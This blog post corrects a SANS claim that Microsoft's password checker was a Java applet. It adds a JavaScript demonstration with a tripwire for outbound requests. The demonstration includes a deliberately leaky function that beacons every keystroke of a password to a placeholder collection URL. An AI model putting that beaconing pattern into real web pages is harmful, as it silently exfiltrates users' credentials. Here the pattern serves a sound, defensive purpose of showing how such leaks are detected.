April 24, 2006

Microsoft password checker - misinformation

The blog entry at http://isc.sans.org/diary.php?storyid=1285 contains some bad information about Microsoft's recently published password strength checker that needs to be corrected.

In this blog post, the author states:
GOOD it's a java applet that appears to run locally so your password is never sent over the internet


This is clearly NOT a Java applet, as a cursory peek at the HTML source shows. The password input field named 'pc001' has an 'onKeyUp' event handler that calls a JavaScript function named EvalPwdStrength. That function is downloaded from here.
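Whether a checker like this runs locally is something you can verify rather than take on faith: the handler is plain JavaScript, so you can instrument the browser's outbound-request primitives before typing and see if any keystroke leaves the page. The following is an added example written for this post, not code from the Microsoft page or the SANS diary. It implements a local-only evaluator of the same shape (an onKeyUp-style handler calling a function of the field's value), a deliberately leaky variant constructed for contrast, and a tripwire that records every attempted request. The function name evalPwdStrength mirrors the page; the scoring rules, the collection URL and the sample password are assumptions for illustration. The environment object is passed explicitly so the example runs under Node; in a real page you would wrap window.fetch, XMLHttpRequest.prototype.send, navigator.sendBeacon and the Image src setter the same way.

```javascript
'use strict';

// Local-only strength check: a pure function of the password, nothing else.
// The scoring rules are an illustrative assumption, not Microsoft's algorithm.
function evalPwdStrength(pwd) {
  if (!pwd) return 'empty';
  let classes = 0;
  if (/[a-z]/.test(pwd)) classes++;
  if (/[A-Z]/.test(pwd)) classes++;
  if (/[0-9]/.test(pwd)) classes++;
  if (/[^A-Za-z0-9]/.test(pwd)) classes++;
  if (pwd.length < 8 || classes < 2) return 'weak';
  return pwd.length * classes < 42 ? 'medium' : 'strong';
}

// A deliberately leaky variant: same result, but every keystroke is also
// beaconed to a collection URL via an image request. Constructed here only
// to show what the tripwire catches; the page makes no such claim about
// Microsoft's script. The URL is a placeholder.
function leakyEvalPwdStrength(pwd, env) {
  const beacon = new env.Image();
  beacon.src = 'https://example.invalid/collect?p=' + encodeURIComponent(pwd);
  return evalPwdStrength(pwd);
}

// Tripwire environment: stand-ins for the browser APIs a script could use to
// send data out. Each one records what it was asked to send.
function makeTripwireEnv() {
  const calls = [];
  const record = (api, payload) => calls.push({ api, payload: String(payload) });
  return {
    calls,
    fetch(url, opts) { record('fetch', `${url} ${(opts && opts.body) || ''}`); return Promise.resolve(); },
    XMLHttpRequest: class {
      open(_method, url) { this.url = String(url); }
      send(body) { record('xhr', `${this.url} ${body || ''}`); }
    },
    navigator: { sendBeacon(url, data) { record('sendBeacon', `${url} ${data || ''}`); return true; } },
    Image: class { set src(v) { record('img', v); } },
  };
}

// Drive the handler the way an onKeyUp event would: once per keystroke with
// the field's current value. Report the strength states and any network
// activity observed while typing.
function auditHandler(handler, pwd) {
  const env = makeTripwireEnv();
  const states = [];
  for (let i = 1; i <= pwd.length; i++) states.push(handler(pwd.slice(0, i), env));
  const leakedFull = env.calls.some(c => c.payload.includes(encodeURIComponent(pwd)));
  return { states, requests: env.calls.length, leakedFull, calls: env.calls };
}

// Compare the two handlers on a constructed sample password.
for (const [name, handler] of [['local', evalPwdStrength], ['leaky', leakyEvalPwdStrength]]) {
  const r = auditHandler(handler, 'Tr0ub4dor&3');
  console.log(name, 'final:', r.states[r.states.length - 1], 'requests:', r.requests, 'leaked:', r.leakedFull);
}
```

The local handler produces zero requests while typing; the leaky one produces one per keystroke, and the last beacon carries the full password. A checker that makes any outbound request while you type is one you should not be entering real passwords into, whatever its page says.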

I notified SANS of the misinformation and requested a correction be published. I guess this is a good reminder that you can't believe everything you read on the internet; even from a popular site such as SANS (including my blog too!) :)

I agree with the SANS author's assertion that typing your passwords into a web page, no matter where it's hosted, is a bad idea. Just follow the guidelines and you'll have strong passwords.

If you have trouble remembering lots of strong passwords, try using a password manager program such as:


cheers
jk
